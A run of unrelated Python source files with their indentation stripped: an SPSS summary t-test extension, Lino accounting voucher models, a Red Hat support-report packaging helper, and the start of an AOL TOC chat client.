pt.addrow(_("Equal variances not assumed"), cvalues=[d.diff, d.eedif2, d.t2, d.df2, d.t2sig])
pt.generate()
pt = NonProcPivotTable("Confidence Intervals", outlinetitle=_("Confidence Intervals"),
tabletitle=seq + _("%.1f%% Confidence Intervals for Difference") % ci,
columnlabels=[_("Lower Limit"), _("Upper Limit")])
pt.addrow(rowlabel=_("Asymptotic (equal variance)"), cvalues=[d.low1, d.upp1])
pt.addrow(rowlabel=_("Asymptotic (unequal variance)"), cvalues=[d.low2, d.upp2])
pt.addrow(rowlabel=_("Exact (equal variance)"), cvalues = [d.low1exact, d.upp1exact])
pt.addrow(rowlabel=_("Exact (unequal variance)"), cvalues = [d.low2exact, d.upp2exact])
pt.generate()
spss.EndProcedure()
try:
if not currentactive is None:
spss.Submit("DATASET ACTIVATE " + currentactive)
else:
spss.Submit("""NEW FILE.
DATASET NAME D%s.""" % str(random.uniform(0,1)))
except:
pass
def Run(args):
"""Execute the SPSSINC SUMMARY TTEST extension command"""
args = args[list(args.keys())[0]]
oobj = Syntax([
Template("N1", subc="", ktype="float", var="n1", vallist=[0], islist=True),
Template("N2", subc="", ktype="float", var="n2", vallist=[0], islist=True),
Template("MEAN1", subc="", ktype="float", var="mean1", islist=True),
Template("MEAN2", subc="", ktype="float", var="mean2", islist=True),
Template("SD1", subc="", ktype="float", var="sd1", vallist=[0.0001], islist=True),
Template("SD2", subc="", ktype="float", var="sd2", vallist=[0.0001], islist=True),
Template("LABEL1", subc="", ktype="literal", var="label1", islist=True),
Template("LABEL2", subc="", ktype="literal", var="label2", islist=True),
Template("CI", subc="", ktype="float", var="ci", vallist=[.1, 99.9999]),
Template("HELP", subc="", ktype="bool")])
#enable localization
global _
try:
_("---")
except:
def _(msg):
return msg
# A HELP subcommand overrides all else
if "HELP" in args:
#print helptext
helper()
else:
processcmd(oobj, args, summaryttest)
def helper():
"""open html help in default browser window
The location is computed from the current module name"""
import webbrowser, os.path
path = os.path.splitext(__file__)[0]
helpspec = "file://" + path + os.path.sep + \
"markdown.html"
# webbrowser.open seems not to work well
browser = webbrowser.get()
if not browser.open_new(helpspec):
print(("Help file not found:" + helpspec))
try: #override
from extension import helper
except:
pass
class NonProcPivotTable(object):
"""Accumulate an object that can be turned into a basic pivot table once a procedure state can be established"""
def __init__(self, omssubtype, outlinetitle="", tabletitle="", caption="", rowdim="", coldim="", columnlabels=[],
procname="Messages"):
"""omssubtype is the OMS table subtype.
caption is the table caption.
tabletitle is the table title.
columnlabels is a sequence of column labels.
If columnlabels is empty, this is treated as a one-column table, and the rowlabels are used as the values with
the label column hidden
procname is the procedure name. It must not be translated."""
attributesFromDict(locals())
self.rowlabels = []
self.columnvalues = []
self.rowcount = 0
def addrow(self, rowlabel=None, cvalues=None):
"""Append a row labelled rowlabel to the table and set value(s) from cvalues.
rowlabel is a label for the stub.
cvalues is a sequence of values with the same number of values as there are columns in the table."""
if cvalues is None:
cvalues = []
self.rowcount += 1
if rowlabel is None:
self.rowlabels.append(str(self.rowcount))
else:
self.rowlabels.append(rowlabel)
self.columnvalues.extend(cvalues)
def generate(self):
"""Produce the table assuming that a procedure state is now in effect if it has any rows."""
privateproc = False
if self.rowcount > 0:
try:
table = spss.BasePivotTable(self.tabletitle, self.omssubtype)
except:
spss.StartProcedure(self.procname)
privateproc = True
table = spss.BasePivotTable(self.tabletitle, self.omssubtype)
if self.caption:
table.Caption(self.caption)
if self.columnlabels != []:
table.SimplePivotTable(self.rowdim, self.rowlabels, self.coldim, self.columnlabels, self.columnvalues)
else:
table.Append(spss.Dimension.Place.row,"rowdim",hideName=True,hideLabels=True)
table.Append(spss.Dimension.Place.column,"coldim",hideName=True,hideLabels=True)
colcat = spss.CellText.String("Message")
for r in self.rowlabels:
cellr = spss.CellText.String(r)
table[(cellr, colcat)] = cellr
if privateproc:
spss.EndProcedure()
def attributesFromDict(d):
"""build self attributes from a dictionary d."""
self = d.pop('self')
for name, value in d.items():
setattr(self, name, value)
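# attributesFromDict(locals()) in NonProcPivotTable.__init__ above uses this
# helper to turn every named constructor argument into an attribute of self
# without a line of boilerplate per argument.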
|
|
# Copyright 2008-2020 Rumma & Ko Ltd
# License: GNU Affero General Public License v3 (see file COPYING for details)
from django.db import models
# from django.core.exceptions import ValidationError
from etgen.html import E, join_elems
from lino_xl.lib.ledger.utils import ZERO, MAX_AMOUNT
from lino_xl.lib.ledger.fields import DcAmountField
from lino_xl.lib.ledger.choicelists import DC, VoucherTypes
from lino_xl.lib.ledger.roles import LedgerUser, LedgerStaff
from lino_xl.lib.ledger.mixins import ProjectRelated
from lino_xl.lib.ledger.mixins import PartnerRelated
from lino_xl.lib.sepa.mixins import BankAccount
from lino.modlib.printing.mixins import Printable
from lino.api import dd, rt, _
from .mixins import (FinancialVoucher, FinancialVoucherItem,
DatedFinancialVoucher, DatedFinancialVoucherItem)
from .actions import WritePaymentsInitiation
ledger = dd.resolve_app('ledger')
def warn_jnl_account(jnl):
fld = jnl._meta.get_field('account')
raise Warning(_("Field '{0}' in journal '{0}' is empty!").format(
fld.verbose_name, jnl))
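# Note: despite its name this helper raises Warning rather than logging one;
# presumably Lino catches Warning and shows it to the user as an error message.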
class ShowSuggestions(dd.Action):
# started as a copy of ShowSlaveTable
# TABLE2ACTION_ATTRS = tuple('help_text icon_name label sort_index'.split())
TABLE2ACTION_ATTRS = tuple('help_text label sort_index'.split())
show_in_bbar = False
show_in_workflow = True
readonly = False
@classmethod
def get_actor_label(self):
return self._label or self.suggestions_table.label
def attach_to_actor(self, actor, name):
if actor.suggestions_table is None:
# logger.info("%s has no suggestions_table", actor)
return # don't attach
if isinstance(actor.suggestions_table, str):
T = rt.models.resolve(actor.suggestions_table)
if T is None:
raise Exception("No table named %s" % actor.suggestions_table)
actor.suggestions_table = T
for k in self.TABLE2ACTION_ATTRS:
setattr(self, k, getattr(actor.suggestions_table, k))
return super(ShowSuggestions, self).attach_to_actor(actor, name)
def run_from_ui(self, ar, **kw):
obj = ar.selected_rows[0]
sar = ar.spawn(ar.actor.suggestions_table, master_instance=obj)
js = ar.renderer.request_handler(sar)
ar.set_response(eval_js=js)
def unused_get_action_permission(self, ar, obj, state):
# It would more intuitive to show Suggestions only for lines
# with a partner. But there are cases where we use it on an
# empty item in order to select suggestions from multiple
# partners.
if not obj.get_partner():
return False
return super(ShowSuggestions, self).get_action_permission(
ar, obj, state)
class JournalEntry(DatedFinancialVoucher, ProjectRelated):
auto_compute_amount = True
class Meta:
app_label = 'finan'
abstract = dd.is_abstract_model(__name__, 'JournalEntry')
verbose_name = _("Journal Entry")
verbose_name_plural = _("Journal Entries")
# show_items = dd.ShowSlaveTable('finan.ItemsByJournalEntry')
def get_wanted_movements(self):
# dd.logger.info("20151211 FinancialVoucher.get_wanted_movements()")
amount, movements_and_items = self.get_finan_movements()
if amount:
raise Warning(_("Missing amount {} in movements").format(
amount))
for m, i in movements_and_items:
yield m
class PaymentOrder(FinancialVoucher, Printable):
class Meta:
app_label = 'finan'
abstract = dd.is_abstract_model(__name__, 'PaymentOrder')
verbose_name = _("Payment Order")
verbose_name_plural = _("Payment Orders")
total = dd.PriceField(_("Total"), blank=True, null=True)
execution_date = models.DateField(
_("Execution date"), blank=True, null=True)
# show_items = dd.ShowSlaveTable('finan.ItemsByPaymentOrder')
write_xml = WritePaymentsInitiation()
@dd.displayfield(_("Print"))
def print_actions(self, ar):
if ar is None:
return ''
elems = []
elems.append(ar.instance_action_button(
self.write_xml))
return E.p(*join_elems(elems, sep=", "))
def get_wanted_movements(self):
"""Implements
:meth:`lino_xl.lib.ledger.Voucher.get_wanted_movements`
for payment orders.
As a side effect this also computes the :attr:`total` field and saves
the voucher.
"""
# dd.logger.info("20151211 cosi.PaymentOrder.get_wanted_movements()")
acc = self.journal.account
if not acc:
warn_jnl_account(self.journal)
# TODO: what if the needs_partner of the journal's account
# is not checked? Shouldn't we raise an error here?
amount, movements_and_items = self.get_finan_movements()
if abs(amount) > MAX_AMOUNT:
# dd.logger.warning("Oops, {} is too big ({})".format(amount, self))
raise Exception("Oops, {} is too big ({})".format(amount, self))
return
self.total = self.journal.dc.normalized_amount(-amount) # PaymentOrder.get_wanted_movements()
# if self.journal.dc == DC.debit: # PaymentOrder.get_wanted_movements()
# self.total = -amount
# else:
# self.total = amount
item_partner = self.journal.partner is None
for m, i in movements_and_items:
yield m
if item_partner:
yield self.create_movement(
i, (acc, None), m.project, -m.amount, # 20201219 PaymentOrder.get_wanted_movements
partner=m.partner, match=i.get_match())
if not item_partner:
yield self.create_movement(
None, (acc, None), None, -amount, # 20201219 PaymentOrder.get_wanted_movements
partner=self.journal.partner, match=self)
# 20191226 partner=self.journal.partner, match=self.get_default_match())
# no need to save() because this is called during set_workflow_state()
# self.full_clean()
# self.save()
def add_item_from_due(self, obj, **kwargs):
# if obj.bank_account is None:
# return
i = super(PaymentOrder, self).add_item_from_due(obj, **kwargs)
i.bank_account = obj.bank_account
return i
# def full_clean(self, *args, **kwargs):
# super(PaymentOrder, self).full_clean(*args, **kwargs)
class BankStatement(DatedFinancialVoucher):
class Meta:
app_label = 'finan'
abstract = dd.is_abstract_model(__name__, 'BankStatement')
verbose_name = _("Bank Statement")
verbose_name_plural = _("Bank Statements")
balance1 = dd.PriceField(_("Old balance"), default=ZERO)
balance2 = dd.PriceField(_("New balance"), default=ZERO, blank=True)
# show_items = dd.ShowSlaveTable('finan.ItemsByBankStatement')
def get_previous_voucher(self):
if not self.journal_id:
#~ logger.info("20131005 no journal")
return None
qs = self.__class__.objects.filter(
journal=self.journal).order_by('-entry_date')
if qs.count() > 0:
#~ logger.info("20131005 no other vouchers")
return qs[0]
def on_create(self, ar):
super(BankStatement, self).on_create(ar)
if self.balance1 == ZERO:
prev = self.get_previous_voucher()
if prev is not None:
#~ logger.info("20131005 prev is %s",prev)
self.balance1 = prev.balance2
def on_duplicate(self, ar, master):
self.balance1 = self.balance2 = ZERO
super(BankStatement, self).on_duplicate(ar, master)
def get_wanted_movements(self):
"""Implements
:meth:`lino_xl.lib.ledger.Voucher.get_wanted_movements`
for bank statements.
As a side effect this also computes the :attr:`balance1` and
:attr:`balance2` fields and saves the voucher.
"""
# dd.logger.info("20151211 cosi.BankStatement.get_wanted_movements()")
a = self.journal.account
if not a:
warn_jnl_account(self.journal)
amount, movements_and_items = self.get_finan_movements()
# dd.logger.info("20210106 %s %s %s", self.balance2, self.balance1, amount)
self.balance2 = self.balance1 + self.journal.dc.normalized_amount(amount) # 20201219 BankStatement.get_wanted_movements()
# if self.journal.dc == DC.credit: # 20201219 BankStatement.get_wanted_movements()
# self.balance2 = self.balance1 + amount
# else:
# self.balance2 = self.balance1 - amount
if abs(self.balance2) > MAX_AMOUNT:
# dd.logger.warning("Oops, %s is too big", self.balance2)
raise Exception("Oops, {} is too big ({})".format(self.balance2, self))
return
for m, i in movements_and_items:
yield m
yield self.create_movement(None, (a, None), None, amount)
# no need to save() because this is called during set_workflow_state()
# self.full_clean()
# self.save()
class JournalEntryItem(DatedFinancialVoucherItem):
class Meta:
app_label = 'finan'
verbose_name = _("Journal Entry item")
verbose_name_plural = _("Journal Entry items")
voucher = dd.ForeignKey('finan.JournalEntry', related_name='items')
debit = DcAmountField(DC.debit, _("Debit"))
credit = DcAmountField(DC.credit, _("Credit"))
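# DcAmountField presumably renders the item's single signed amount as a pair
# of one-sided columns; the same pattern recurs below as expense/income on
# bank statement items and to_pay on payment order items.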
class BankStatementItem(DatedFinancialVoucherItem):
class Meta:
app_label = 'finan'
verbose_name = _("Bank Statement item")
verbose_name_plural = _("Bank Statement items")
voucher = dd.ForeignKey('finan.BankStatement', related_name='items')
expense = DcAmountField(DC.debit, _("Expense"))
income = DcAmountField(DC.credit, _("Income"))
class PaymentOrderItem(BankAccount, FinancialVoucherItem):
class Meta:
app_label = 'finan'
verbose_name = _("Payment Order item")
verbose_name_plural = _("Payment Order items")
voucher = dd.ForeignKey('finan.PaymentOrder', related_name='items')
# bank_account = dd.ForeignKey('sepa.Account', blank=True, null=True)
to_pay = DcAmountField(DC.debit, _("To pay")) # 20201219 PaymentOrderItem
# def partner_changed(self, ar):
# FinancialVoucherItem.partner_changed(self, ar)
# BankAccount.partner_changed(self, ar)
# def full_clean(self, *args, **kwargs):
# super(PaymentOrderItem, self).full_clean(*args, **kwargs)
# dd.update_field(PaymentOrderItem, 'iban', blank=True)
# dd.update_field(PaymentOrderItem, 'bic', blank=True)
class JournalEntryDetail(dd.DetailLayout):
main = "general more"
general = dd.Panel("""
entry_date number:6 workflow_buttons
narration
finan.ItemsByJournalEntry
""", label=_("General"))
more = dd.Panel("""
journal accounting_period user id
item_account item_remark
ledger.MovementsByVoucher
""", label=_("More"))
class PaymentOrderDetail(JournalEntryDetail):
general = dd.Panel("""
entry_date number:6 total execution_date workflow_buttons
narration
finan.ItemsByPaymentOrder
""", label=_("General"))
class BankStatementDetail(JournalEntryDetail):
general = dd.Panel("""
general_left uploads.UploadsByController
finan.ItemsByBankStatement
""", label=_("General"))
general_left = """
entry_date number:6 balance1 balance2
narration workflow_buttons
"""
class FinancialVouchers(dd.Table):
model = 'finan.JournalEntry'
required_roles = dd.login_required(LedgerUser)
params_panel_hidden = True
order_by = ["id", "entry_date"]
parameters = dict(
pyear=dd.ForeignKey('ledger.FiscalYear', blank=True),
#~ ppartner=dd.ForeignKey('contacts.Partner',blank=True,null=True),
pjournal=ledger.JournalRef(blank=True))
params_layout = "pjournal pyear"
detail_layout = JournalEntryDetail()
insert_layout = dd.InsertLayout("""
entry_date
narration
""", window_size=(40, 'auto'))
suggest = ShowSuggestions()
suggestions_table = None # 'finan.SuggestionsByJournalEntry'
@classmethod
def get_request_queryset(cls, ar, **kwargs):
qs = super(FinancialVouchers, cls).get_request_queryset(ar, **kwargs)
if not isinstance(qs, list):
if ar.param_values.pyear:
qs = qs.filter(accounting_period__year=ar.param_values.pyear)
if ar.param_values.pjournal:
qs = qs.filter(journal=ar.param_values.pjournal)
return qs
class JournalEntries(FinancialVouchers):
suggestions_table = 'finan.SuggestionsByJournalEntry'
column_names = "number_with_year entry_date narration "\
"accounting_period workflow_buttons *"
class PaymentOrders(FinancialVouchers):
model = 'finan.PaymentOrder'
column_names = "number_with_year entry_date narration total "\
"execution_date accounting_period workflow_buttons *"
detail_layout = PaymentOrderDetail()
suggestions_table = 'finan.SuggestionsByPaymentOrder'
class BankStatements(FinancialVouchers):
model = 'finan.BankStatement'
column_names = "number_with_year entry_date balance1 balance2 " \
"accounting_period workflow_buttons *"
detail_layout = 'finan.BankStatementDetail'
insert_layout = """
entry_date
balance1
"""
suggestions_table = 'finan.SuggestionsByBankStatement'
class AllBankStatements(BankStatements):
required_roles = dd.login_required(LedgerStaff)
class AllJournalEntries(JournalEntries):
required_roles = dd.login_required(LedgerStaff)
class AllPaymentOrders(PaymentOrders):
required_roles = dd.login_required(LedgerStaff)
class PaymentOrdersByJournal(ledger.ByJournal, PaymentOrders):
pass
class JournalEntriesByJournal(ledger.ByJournal, JournalEntries):
pass
class BankStatementsByJournal(ledger.ByJournal, BankStatements):
pass
from lino_xl.lib.ledger.mixins import ItemsByVoucher
# class ItemsByVoucher(ItemsByVoucher):
# suggest = ShowSuggestions()
# suggestions_table = None # 'finan.SuggestionsByJournalEntry'
# display_mode = 'html'
# preview_limit = 0
# label = _("Content")
class ItemsByJournalEntry(ItemsByVoucher):
model = 'finan.JournalEntryItem'
column_names = "seqno date partner match account:50 debit credit remark *"
sum_text_column = 2
class ItemsByBankStatement(ItemsByVoucher):
model = 'finan.BankStatementItem'
column_names = "seqno date partner account match remark expense income "\
"workflow_buttons *"
sum_text_column = 2
suggestions_table = 'finan.SuggestionsByBankStatementItem'
suggest = ShowSuggestions()
class ItemsByPaymentOrder(ItemsByVoucher):
model = 'finan.PaymentOrderItem'
column_names = "seqno partner workflow_buttons bank_account match "\
"to_pay remark *"
suggestions_table = 'finan.SuggestionsByPaymentOrderItem'
suggest = ShowSuggestions()
sum_text_column = 1
class FillSuggestionsToVoucher(dd.Action):
label = _("Fill")
icon_name = 'lightning'
http_method = 'POST'
select_rows = False
def run_from_ui(self, ar, **kw):
voucher = ar.master_instance
seqno = None
n = 0
for obj in ar.selected_rows:
i = voucher.add_item_from_due(obj, seqno=seqno)
if i is not None:
# dd.logger.info("20151117 gonna full_clean %s", obj2str(i))
i.full_clean()
# dd.logger.info("20151117 gonna save %s", obj2str(i))
i.save()
# dd.logger.info("20151117 ok")
seqno = i.seqno + 1
n += 1
msg = _("%d items have been added to %s.") % (n, voucher)
# logger.info(msg)
kw.update(close_window=True)
ar.success(msg, **kw)
class FillSuggestionsToVoucherItem(FillSuggestionsToVoucher):
def run_from_ui(self, ar, **kw):
i = ar.master_instance
obj = ar.selected_rows[0]
# i is the voucher item from which the suggestion table had
# been called. obj is the first selected DueMovement object
# dd.logger.info("20210106 %s", i)
i.fill_suggestion(obj)
# for k, v in voucher.due2itemdict(obj).items():
# setattr(i, k, v)
i.full_clean()
i.save()
voucher = i.voucher
seqno = i.seqno
n = 0
for obj in ar.selected_rows[1:]:
i = voucher.add_item_from_due(obj, seqno=seqno)
if i is not None:
# dd.logger.info("20151117 gonna full_clean %s", obj2str(i))
i.on_create(ar)
i.full_clean()
# dd.logger.info("20151117 gonna save %s", obj2str(i))
i.save()
# dd.logger.info("20151117 ok")
seqno = i.seqno + 1
n += 1
msg = _("%d items have been added to %s.") % (n, voucher)
# logger.info(msg)
kw.update(close_window=True)
ar.success(msg, **kw)
class SuggestionsByVoucher(ledger.ExpectedMovements):
label = _("Suggestions")
# column_names = 'partner project match account due_date debts payments balance *'
column_names = 'info match due_date debts payments balance *'
window_size = ('90%', 20) # (width, height)
editable = False
auto_fit_column_widths = True
cell_edit = False
do_fill = FillSuggestionsToVoucher()
@classmethod
def get_dc(cls, ar=None):
if ar is None:
raise Exception("20200119 ar is None")
voucher = ar.master_instance
if voucher is None:
raise Exception("20200119 voucher is None")
# return voucher.journal.dc.opposite() # 20201219 SuggestionsByVoucher.get_dc()
return voucher.journal.dc # 20201219 SuggestionsByVoucher.get_dc()
@classmethod
def param_defaults(cls, ar, **kw):
kw = super(SuggestionsByVoucher, cls).param_defaults(ar, **kw)
voucher = ar.master_instance
kw.update(for_journal=voucher.journal)
if not dd.plugins.finan.suggest_future_vouchers:
kw.update(date_until=voucher.entry_date)
# kw.update(trade_type=vat.TradeTypes.purchases)
return kw
@classmethod
def get_data_rows(cls, ar, **flt):
#~ partner = ar.master_instance
#~ if partner is None: return []
flt.update(cleared=False)
# flt.update(account__clearable=True)
return super(SuggestionsByVoucher, cls).get_data_rows(ar, **flt)
class SuggestionsByJournalEntry(SuggestionsByVoucher):
master = 'finan.JournalEntry'
class SuggestionsByPaymentOrder(SuggestionsByVoucher):
master = 'finan.PaymentOrder'
# column_names = 'partner match account due_date debts payments balance bank_account *'
column_names = 'info match due_date debts payments balance *'
quick_search_fields = 'info'
@classmethod
def param_defaults(cls, ar, **kw):
kw = super(SuggestionsByPaymentOrder, cls).param_defaults(ar, **kw)
voucher = ar.master_instance
if voucher.journal.sepa_account:
kw.update(show_sepa=dd.YesNo.yes)
kw.update(same_dc=dd.YesNo.yes) # 20201219 SuggestionsByPaymentOrder.param_defaults same_dc
# kw.update(journal=voucher.journal)
kw.update(date_until=voucher.execution_date or voucher.entry_date)
# if voucher.journal.trade_type is not None:
# kw.update(trade_type=voucher.journal.trade_type)
# kw.update(trade_type=vat.TradeTypes.purchases)
return kw
class SuggestionsByBankStatement(SuggestionsByVoucher):
master = 'finan.BankStatement'
class SuggestionsByVoucherItem(SuggestionsByVoucher):
do_fill = FillSuggestionsToVoucherItem()
@classmethod
def get_dc(cls, ar=None):
if ar is None:
return None
item = ar.master_instance
if item is None:
return None
# return item.voucher.journal.dc.opposite() # 20201219 SuggestionsByVoucherItem.get_dc()
return item.voucher.journal.dc # 20201219 SuggestionsByVoucherItem.get_dc()
@classmethod
def param_defaults(cls, ar, **kw):
# Note that we skip the immediate parent
kw = super(SuggestionsByVoucher, cls).param_defaults(ar, **kw)
item = ar.master_instance
voucher = item.voucher
kw.update(for_journal=voucher.journal)
if not dd.plugins.finan.suggest_future_vouchers:
kw.update(date_until=voucher.entry_date)
kw.update(partner=item.partner)
return kw
class SuggestionsByBankStatementItem(SuggestionsByVoucherItem):
master = 'finan.BankStatementItem'
class SuggestionsByPaymentOrderItem(SuggestionsByVoucherItem):
master = 'finan.PaymentOrderItem'
# Declare the voucher types:
VoucherTypes.add_item_lazy(JournalEntriesByJournal)
VoucherTypes.add_item_lazy(PaymentOrdersByJournal)
VoucherTypes.add_item_lazy(BankStatementsByJournal)
# VoucherTypes.add_item_lazy(GroupersByJournal)
|
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2012 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from redhat_support_lib.xml import report as report
import StringIO
import datetime
import dateutil.tz as tz
import logging
import os
import platform
import re as re
import shutil
import subprocess
import sys
import tarfile
import tempfile
logger = logging.getLogger("redhat_support_lib.utils.reporthelper")
__author__ = 'Tim Walsh tdwalsh@redhat.com'
__author__ = 'Keith Robertson kroberts@redhat.com'
# specify the max size of a file that can
# be included by value in the xml file
# before it is included as a href
MAX_FILE_SIZE_BYTES = 300000
def rpm_for_file(fileName):
"""
Find the rpm name that provides a specific file.
fileName -- Find the rpm package that supplies this file.
Equivalent to
rpm -qf /etc/passwd
setup-2.8.48-1.fc17
"""
rpmName = None
try:
import rpm
ts = rpm.TransactionSet()
# loop headers to build package name
fileName = os.path.abspath(fileName)
origFileName = fileName
while not rpmName:
headers = ts.dbMatch('basenames', fileName)
for h in headers:
rpmName = "%s-%s-%s" % (h['name'], h['version'], h['release'])
break
fileName = os.path.dirname(fileName)
if (len(fileName) <= 1):
# just in case short circuit
break
if not ts.dbMatch('basenames', origFileName):
return None
except ImportError:
pass
return rpmName
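# The dirname walk lets a file inside an rpm-owned directory resolve to the
# owning package, but the final dbMatch guard still returns None unless the
# original path itself appears in the rpm database.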
def get_file_type(fileName):
try:
proc = subprocess.Popen(['file', '-bi', '--', fileName],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = proc.communicate()
if proc.returncode == 0:
return str(stdout).rstrip()
else:
logger.debug(stderr)
raise Exception
except Exception, e:
logger.debug('Problem determining file type of %s. Exception: %s' % \
(fileName, e))
return 'application/octet-stream; charset=binary'
def contains_invalid_xml_chars(fileName):
# BZ967510 - check for certain control chars which are invalid XML
illegal_xml_chars = \
re.compile(u'[\x00-\x08\x0b\x0c\x0e-\x1F\uD800-\uDFFF\uFFFE\uFFFF]')
f = open(fileName, 'rb')
count = os.path.getsize(fileName)
try:
while count > 0:
content = f.read(4096)
if content is None:
raise Exception("Problem encountered reading %s" % (fileName))
count = count - len(content)
if re.search(illegal_xml_chars, content):
return True
finally:
f.close()
return False
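# Example: a log file containing a stray \x07 (BEL) byte matches the pattern
# above, so _process_file below ships it inside the tar archive instead of
# inlining it into content.xml.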
def _process_file(fileName,
report_obj,
tar_refs=None,
max_file_size=MAX_FILE_SIZE_BYTES,
name=None):
"""
Process a specific fileName as either a value in xml fileName
or entry in tar fileName
"""
if not name:
name = os.path.basename(fileName)
mtype = get_file_type(fileName)
if os.path.getsize(fileName) > max_file_size or \
str(mtype).rfind('charset=binary') >= 0 or \
contains_invalid_xml_chars(fileName):
tar_refs.append(fileName)
report_obj.add_binding(report.binding(name=name,
fileName=fileName,
type_=mtype,
href='content/%s' % \
(os.path.basename(fileName))))
else:
# read content from fileName and place into xml
f = open(fileName, 'rb')
try:
content = f.read()
finally:
f.close()
# BZ967510 - handle &#.*; chars and nested CDATA sections
if re.search('[&;<>]', content):
content = content.replace(']]>',']]]]><![CDATA[>')
content = u'<![CDATA[%s]]>' % (content.decode('utf-8'))
try:
report_obj.add_binding(report.binding(name=name,
fileName=fileName,
type_=mtype,
valueOf_=content))
except Exception, e:
print e
def _add_sys_info(report_obj,
fileName):
"""
Add the system specific info to the report object. Handles the case where
these objects are already included via ABRT, in which case the ABRT information
will not be overwritten.
report_obj -- The redhat_support_lib.xml.report to which binding should be added.
fileName -- The original file or directory supplied by the user. This will be
queried to determine package information.
Information added:
- Kernel version
- Package info
- Hostname
- OS Arch
- OS Release
"""
info = {'kernel': True,
'package': True,
'hostname': True,
'architecture': True,
'os_release': True}
# Step 1: See what is already there.
bAry = report_obj.get_binding()
for b in bAry:
if b.get_name() in info:
info[b.get_name()] = False
if info['kernel']:
report_obj.add_binding(report.binding(name='kernel',
valueOf_=platform.release()))
if info['package']:
report_obj.add_binding(report.binding(name='package',
valueOf_=rpm_for_file(fileName)))
if info['hostname']:
report_obj.add_binding(report.binding(name='hostname',
valueOf_=platform.node()))
if info['architecture']:
report_obj.add_binding(report.binding(name='architecture',
valueOf_=platform.processor()))
if info['os_release']:
report_obj.add_binding(report.binding(name='os_release',
valueOf_=str(' ').join(platform.dist())))
def _add_custom(report_obj,
custom):
'''
Add any custom bindings to the content.xml
report_obj -- The redhat_support_lib.xml.report to which binding should be added.
custom -- A dictionary of bindings. The key will be the binding's name and
the value will be the binding's value.
e.g.
<binding name='uid'>500</binding>
'''
for i in custom:
report_obj.add_binding(report.binding(name=i,
valueOf_=custom[i]))
def _write_report_file(report_obj,
temp_dir,
tar_refs=None):
'''
report_obj -- The redhat_support_lib.xml.report to which binding should be added.
temp_dir -- A valid directory into which a report file will be placed.
tar_refs -- An array of files to be added to the tar.bz2
'''
out = None
content_xml = None
out_file = None
try:
try:
# Marshal everything into a tar or XML file.
content_xml = StringIO.StringIO()
content_xml.write('<?xml version="1.0" ?>' + os.linesep)
report_obj.export(content_xml,
0,
namespace_='',
namespacedef_='xmlns="http://www.redhat.com/gss/strata"')
if tar_refs:
out_file = os.path.join(temp_dir,
'report-%s.tar.bz2' % \
(datetime.datetime.now(
tz=tz.tzutc()).strftime("%Y%m%d%H%M%S")))
out = tarfile.open(out_file, 'w:bz2')
# Add the descriptor
info = tarfile.TarInfo(name='content.xml')
content_xml.seek(0)
info.size = len(content_xml.getvalue())
info.mtime = os.stat(out_file).st_mtime
out.addfile(tarinfo=info, fileobj=content_xml)
# Add the files.
for i in tar_refs:
logger.debug('adding %s as %s to %s' % (i,
'content/%s' % (os.path.basename(i)),
out_file))
out.add(i, arcname='content/%s' % (os.path.basename(i)))
else:
out_file = os.path.join(temp_dir,
'report-%s.xml' % \
(datetime.datetime.now(\
tz=tz.tzutc()).strftime("%Y%m%d%H%M%S")))
out = open(out_file, 'wb')
out.write(content_xml.getvalue())
except Exception, e:
logger.exception(e)
try:
logger.debug(
"Cleaning up temp directory %s from failed create." % \
(temp_dir))
shutil.rmtree(temp_dir)
except Exception, e:
# Nothing to see here move along please
pass
raise Exception('Unable to create report file in %s.' % (temp_dir))
finally:
if out:
out.close()
if content_xml:
content_xml.close()
return out_file
def make_report(path=None,
custom=None,
max_file_size=MAX_FILE_SIZE_BYTES,
report_dir=None):
"""
Make a report.
A report is made from a path. The 'custom' param allows arbitrary
name/value entries in the XML. Typical use is to only supply the path.
path -- the file or folder from which a report should be made
custom -- A dictionary of bindings. The key will be the binding's name and
the value will be the binding's value.
max_file_size -- The max size (in bytes) of a file which should be included in content.xml.
report_dir -- By default, the generated report file will be placed in a temporary directory
created by mkdtemp. This usually resolves to /tmp; however, if there isn't
enough space there you can specify an alternate base dir for temp files.
Usage:
Generate report xml with a custom name/value binding:
make_report(path="/var/log/messages", custom={"kernel": "2.6.32-71.el6.x86_64"})
Generate report xml with a path to process ( /var/spool/abrt/ccpp-2012-07-10-21:30:32-1920 )
make_report(path="/var/spool/abrt/ccpp-2012-07-10-21:30:32-1920")
return -- The path to an XML file or a tar.bz2, depending on the size and
type of the content under 'path'.
"""
tar_refs = []
temp_dir = None
rpt = report.report()
# check path to be included in report
try:
# Try to make the temporary directory first.
temp_dir = tempfile.mkdtemp(dir=report_dir)
if os.path.isfile(path):
_process_file(fileName=path,
report_obj=rpt,
tar_refs=tar_refs,
max_file_size=max_file_size,
name='description')
elif os.path.isdir(path):
p = os.walk(path)
for root_name, dir_name, file_names in p:
# process files
for fn in file_names:
_process_file(os.path.join(root_name, fn),
rpt,
tar_refs,
max_file_size=max_file_size)
else:
# Fail fast. It is either a file, dir, or none
raise ValueError('Please supply a valid file or directory to process.')
except Exception, e:
logger.debug(e)
raise Exception('Unable to generate report file.')
_add_sys_info(rpt, path)
if custom:
_add_custom(rpt, custom)
return _write_report_file(rpt,
temp_dir,
tar_refs)
if __name__ == '__main__':
# /var/spool/abrt/ccpp-2012-08-16-11:35:40-5397
if len(sys.argv) == 2:
file_name = make_report(path=sys.argv[1])
print('File is %s' % (file_name))
else:
print "Usage: %s /path/to/file-or-dir" % (sys.argv[0])
|
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
############################################
# Py-TOC 1.2
#
# Jamie Turner <jamwt@jamwt.com>
#
DEBUG = 1
import sys
import socket
import re
import struct
from pycopia import sysrandom
TOC_SERV_AUTH = ("login.oscar.aol.com", 5159 )
TOC_SERV = ( "toc.oscar.aol.com", 9898 )
class TOCError(Exception):
pass
class TocTalk(object):
def __init__(self,nick,passwd):
self._nick = nick
self._passwd = passwd
self._agent = "PY-TOC"
